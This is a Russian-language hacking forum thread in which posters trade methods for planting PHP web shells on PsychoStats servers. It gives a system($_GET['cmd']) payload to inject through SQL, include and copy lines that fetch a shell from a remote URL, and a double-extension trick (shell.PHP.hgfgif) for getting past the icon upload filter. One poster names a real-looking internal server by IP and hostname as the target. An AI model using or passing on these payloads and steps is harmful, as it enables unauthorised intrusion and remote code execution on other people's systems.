а там регистр глобалс включен? тебе надо вот это вписывать: <?php system($_GET['cmd']);?> причем это лучше захекисть в sql запросе
Scipio о млин точно ...куль сеньк всем... слу ... а как терь нормальный пхп файлик закинуть на машину... плз подкинь идею
<?php include("http://путь до шелла");?> или <?php copy("http://путь до шелла","shelcheng.php");?> это тоже в хекс исли вариант с copy то он шелл скопирует в текущую папку а с инклюдом и так все понятно
драсьте. у нас есть отдельный "сервер" для игр. виден есессно только в локалке, соответственно адрес 172.17.1.11, так же на сайт можно пройти по сцыле http://games.k26.ru (опять же только в локалке) психостатс расположен в http://172.17.1.11/stats попробовал сплоит с первой страницы - теперь по http://172.17.1.11/stats/ выдет кучу ошибок и ничего не открыват, по http://games.k26.ru/stats/ все отлично открывается. пробовал как в видео. в общем не могу понять. куда можно залить файл. выяснил полный путь сайта. c:/inetpub/wwwroot/stats. видно что это iis. пытался залить файл куда только можно, ничего не получается. может быть потому, что остальные директории запрещены на заливку файлов. так же есть http://games.k26.ru/wow (сервер вов). так же пытался туда залить - безуспешно. и вот думаю - куда лить файл? существуют ли стандартные директории в iis, куда можно лить файлы?
Lordick, найти папку на которую точно есть доступ на запись. Такие папки обычно являются папками хранения всяких аватаров, картинок, вложений и тп. Поищи такие папки в психостате. Если есть форум, посмотри там такую папку. А вообще, я смотрю сервер на винде стоит, там нет таких разграничений на прав, как в *никсах и все папки открыты на запись. Magic Quotes может быть включен=>фильтруются ковычки=>запрос некорректен.
Заливка шелла в PsychoStats Нашёл способ... Заходим в админку > значки, переименовываем шелл в что-то типо shell.PHP.hgfgif, заливаем. Главное чтобы расширение оканчивалось на gif Вот собственно и получаем шелл [path]/images/icons/shell.PHP.hgfgif. Объясняю как это происходит: движок проверяет только три последних символа в расширении файла, поэтому делаем такое расширение PHP.hgfgif, предварительно поставив расширение .PHP. и он этот файл легко пропускает. Для Apach'а расширение .hgfgif неизвестно и поэтому он смотрит на расширение левее и интерпретирует его как php-скрипт! Проверяйте: может и на других двигах сработает...
Короче такая ситуация. Получил доступ к админке. SQL которые были описаны до этого не работают. Зашел в админку, добавил расширение для картинок - png, jpg, gif, php Так. Теперь в icons (где заливать файлы). Такие методы, как менять расширение, как сказал InFlame - file.PHP.asdgif - не катят. Нашел только такой способ: Залил себе на сайт файл. script.php и решил его сразу залить через Upload From URL. - вывел ошибку The URL does not point to an image. Немного подумал. Сделал содержимое файла таким: PHP: <?php header('Content-type: image/php'); echo 'OK!'; ?> Теперь скормил его Upload From URL и файл успешно залился. Переш на него - site.ru/stats/img/icons/script.php и Мне вывело OK! Я обрадовался, начал кормить туда шелл. Но ВОТ ТАКАЯ БЕДА! Содержимое файла оказывается таким, как он выполняется на моем хосте. Тоесть. Если я напимер сделаю <?php system('dir'); ?> То на хосте жертвы будет красоваться содердимое моего хоста. Файл получается статичным. Прошу помощи ))))))))))))))
